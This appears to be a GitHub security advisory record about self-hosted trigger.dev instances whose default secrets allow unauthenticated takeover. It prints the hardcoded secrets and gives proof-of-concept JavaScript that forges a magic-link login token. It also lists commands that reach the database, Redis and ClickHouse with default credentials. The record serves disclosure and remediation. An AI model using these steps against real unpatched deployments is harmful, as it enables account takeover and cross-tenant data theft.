{"id":"GHSA-pqxw-g93w-hj9x","title":"Trigger.dev Self-Hosted Deployment: Default Secrets allow Unauthenticated Infrastructure Compromise","summary":"Trigger.dev Self-Hosted Deployment: Default Secrets allow Unauthenticated Infrastructure Compromise","severity":"high","cwe":["CWE-653","CWE-1393"],"vendor":"trigger.dev","product":"trigger.dev","ecosystem":"npm","affected":["trigger.dev <= 4.5.5"],"patched":["trigger.dev 4.5.6"],"published":"2026-10-02","updated":"2026-10-02","sourceUpdated":"2026-10-02T22:42:08Z","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-pqxw-g93w-hj9x","references":[{"url":"https://github.com/triggerdotdev/trigger.dev/security/advisories/GHSA-pqxw-g93w-hj9x"},{"url":"https://github.com/triggerdotdev/trigger.dev/pull/4316"},{"url":"https://github.com/triggerdotdev/trigger.dev/commit/6997aeb05e27d2db47f9eda01fdc8a17c81a1ae0"},{"url":"https://github.com/triggerdotdev/trigger.dev/releases/tag/v4.5.6"},{"url":"https://github.com/advisories/GHSA-pqxw-g93w-hj9x"}],"tags":["ghsa","npm"],"ingestedAt":"2026-10-02T23:34:57.402Z","slug":"GHSA-pqxw-g93w-hj9x","body":"## Overview\n\n## Summary\n\nSelf-hosted trigger.dev v4 instances deployed using the provided Docker Compose configuration with default secrets from `hosting/docker/.env.example` are vulnerable to a multi-stage unauthenticated attack chain leading to complete infrastructure compromise.\n\n## Vulnerability Details\n\nThe `hosting/docker/.env.example` file contains hardcoded cryptographic secrets:\n\n```\nSESSION_SECRET=2818143646516f6fffd707b36f334bbb\nMAGIC_LINK_SECRET=44da78b7bbb0dfe709cf38931d25dcdd\nENCRYPTION_KEY=f686147ab967943ebbe9ed3b496e465a\nMANAGED_WORKER_SECRET=447c29678f9eaf289e9c4b70d3dd8a7f\n```\n\nThe `MAGIC_LINK_SECRET` is used by `remix-auth-email-link@2.0.2` to create authentication tokens via CryptoJS AES encryption. An attacker who knows this secret can forge valid magic links that authenticate as any email address without email delivery. The `validateSessionMagicLink` option defaults to `false` in the library (never overridden by trigger.dev), so no session-side validation occurs. User accounts are auto-created when `WHITELISTED_EMAILS` is not set (the default for self-hosted).\n\n## Steps to Reproduce\n\n### Setup\n```bash\ncd hosting/docker && cp .env.example .env\ncd webapp && docker compose up -d\ncd ../worker && docker compose up -d\n```\n\n### Step 1: Forge magic link token\n```javascript\nconst CryptoJS = require('crypto-js');\nconst secret = '44da78b7bbb0dfe709cf38931d25dcdd';\nconst payload = JSON.stringify({e: 'attacker@evil.com', c: Date.now()});\nconst token = encodeURIComponent(CryptoJS.AES.encrypt(payload, secret).toString());\nconsole.log('https://target:8030/magic?token=' + token);\n```\n\n### Step 2: Authenticate via forged magic link\n```bash\ncurl -v \"http://localhost:8030/magic?token=\"\n# Returns: HTTP 302, set-cookie: __session=eyJ1c2VyIjp7InVzZXJJZCI6ImNtcGg3OTBxZjAwMDR0bjU1ZWM3bHlxN2EifX0=...\n# User auto-created, session cookie set, redirects to /orgs/new\n```\n\n### Step 3: Verify database access from runner network\n```bash\ndocker run --rm --network webapp postgres:14 psql \"postgresql://postgres:unsafe-postgres-pw@postgres:5432/main\" -c \"SELECT id, email FROM \\\"User\\\";\"\n# Returns: cmph790qf0004tn55ec7lyq7a | attacker@evil.com\n```\n\n### Step 4: Verify Redis access (no auth)\n```bash\ndocker run --rm --network webapp redis:7 redis-cli -h redis PING\n# Returns: PONG\n```\n\n### Step 5: Verify ClickHouse access\n```bash\ndocker run --rm --network webapp curlimages/curl curl -s \"http://default:password@clickhouse:8123/?query=SELECT%20version()\"\n# Returns: 25.5.2.47\n```\n\n## Root Cause\n\n1. Hardcoded secrets in `hosting/docker/.env.example` (lines 9-12)\n2. Runner containers placed on infrastructure networks: `DOCKER_RUNNER_NETWORKS: webapp,supervisor` in `hosting/docker/worker/docker-compose.yml:42`\n3. Default credentials on all infrastructure services\n4. No Redis authentication\n5. SESSION_SECRET reused for JWT signing (`apps/webapp/app/services/apiAuth.server.ts:616`) and impersonation tokens\n\n## Impact\n\nComplete infrastructure compromise: all tenant data, API keys, encrypted secrets (decryptable with known ENCRYPTION_KEY), user accounts, cross-tenant access. Attacker can modify data, push backdoored Docker images to the registry, and manipulate job queues.\n\n## Affected packages\n\n- `trigger.dev <= 4.5.5`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `trigger.dev 4.5.6`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}